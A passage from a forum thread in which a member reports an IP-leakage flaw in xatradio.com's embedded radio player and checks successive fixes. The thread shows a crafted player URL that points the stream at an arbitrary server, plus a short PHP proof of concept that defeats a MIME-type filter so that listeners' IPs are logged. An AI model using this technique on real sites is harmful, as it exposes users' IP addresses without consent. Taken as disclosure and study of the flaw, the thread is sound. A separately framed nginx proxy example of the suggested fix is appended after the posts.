
Vulnerability on xatradio.com / xat's group pages and xatspaces.


iGuano


  • Members
22 minutes ago, Lamingtons said:

Thank you for the report. It was fixed. If you have future issues with xatRadio, try to contact us via http://xatproject.com/support/.

 

Good job. Thanks, I'll report xatradio.com-specific vulnerabilities there from now on.

26 minutes ago, Lamingtons said:

Thank you for the report. It was fixed. If you have future issues with xatRadio, try to contact us via http://xatproject.com/support/.

 

On second glance, it appears you have published an incomplete fix.

I notice you now no longer allow a path (/x.png) in the 'ip' parameter; however, if I simply put the domain itself without the path, it still works.

 

In this case, all I would have to do is have my domain automatically redirect to the png file and it would still work.

This is still fully exploitable.


  • Bot Service Providers
6 minutes ago, iGuano said:

 

Good job. Thanks, I'll report xatradio.com-specific vulnerabilities there from now on.

 

On second glance, it appears you have published an incomplete fix.

I notice you now no longer allow a path (/x.png) in the 'ip' parameter; however, if I simply put the domain itself without the path, it still works.

 

In this case, all I would have to do is have my domain automatically redirect to the png file and it would still work.

This is still fully exploitable.

 

No, you can't, only whitelisted URLs will work. It will display BlockedDomain.


  • Members
3 minutes ago, Lamingtons said:

No, you can't, only whitelisted URLs will work. It will display BlockedDomain.

 

Yes, but I can supply my server IP, not needing a domain at all.

So whitelisting URLs doesn't make a difference.

 

For example, xatradio.com/html5.php?ip=127.0.0.1&port=80&extra=/;stream.mp3


  • Bot Service Providers
1 hour ago, iGuano said:

 

Yes, but I can supply my server IP, not needing a domain at all.

So whitelisting URLs doesn't make a difference.

 

For example, xatradio.com/html5.php?ip=127.0.0.1&port=80&extra=/;stream.mp3

 

OK, thank you again. We're working on it; it will be fixed.


  • Members
6 hours ago, Lamingtons said:

OK, thank you again. We're working on it; it will be fixed.

 

Good job, that second fix seems to have done the trick. I have to pop out, but I'll have another look later and see if it is still vulnerable.


  • Members
10 hours ago, Lamingtons said:

OK, thank you again. We're working on it; it will be fixed.

 

I've had a look at your second fix.

This time it seems you now block all MIME types except "audio/mpeg". However, the IP leakage issue is still present.

 

You would have to actually proxy the stream through your server to avoid this issue, maybe it is a risk xat is willing to take.

 

I created another quick POC; I'll post it below:

 

index.php

<?php
// Send the one content type the filter accepts; the request itself is
// what ends up in the server log, whatever the body contains.
header('Content-Type: audio/mpeg');
?>

 

Now that I've bypassed the mime type blocking, I can still log IP addresses.

 

Server log

[leaked victim ip] - - [04/Mar/2017] "GET /;stream.mp3 HTTP/1.1" 200 15 "http://chatsgroup.com/web_gear/chat/media.php?d=[snip]&p=0&id=[snip]" "Mozilla/5.0 [snip]

 

You can make use of the proxy_pass feature in Nginx to achieve this.
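An added example of the server-side proxying the post above recommends (nginx proxy_pass); this is not xatRadio's or xat's configuration. It assumes the player only passes a station key, which nginx maps to a fixed allowlisted upstream; the host name, upstream addresses and the /stream path are constructed placeholders.

```nginx
# Added example, not xatRadio's configuration. The listener's browser talks
# only to this host; nginx fetches the audio from an allowlisted upstream,
# so the upstream operator sees nginx's address, not the listener's.
# Upstream addresses are constructed placeholders (RFC 5737 range).
map $arg_station $stream_upstream {
    default      "";
    "station-a"  "http://192.0.2.10:8000/;stream.mp3";
    "station-b"  "http://192.0.2.11:8000/;stream.mp3";
}

server {
    listen 80;
    server_name radio.example.invalid;

    # /stream?station=station-a -> proxied from the fixed upstream for that key.
    # No ip/port/extra parameters are accepted, so a request cannot point the
    # player (and every listener's IP) at an arbitrary host.
    location = /stream {
        if ($stream_upstream = "") {
            return 404;
        }

        proxy_pass $stream_upstream;
        proxy_http_version 1.1;
        proxy_set_header Connection "";

        # Audio stream: pass bytes through instead of buffering a whole file.
        proxy_buffering off;

        # Drop request headers that would carry listener details upstream
        # (an empty value removes the header). The Referer and User-Agent
        # seen in the log line above would otherwise be forwarded as well.
        proxy_set_header X-Forwarded-For "";
        proxy_set_header X-Real-IP "";
        proxy_set_header Forwarded "";
        proxy_set_header Referer "";
        proxy_set_header Cookie "";
        proxy_set_header User-Agent "radio-proxy";
    }
}
```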

  • Junior locked this topic
This topic is now closed to further replies.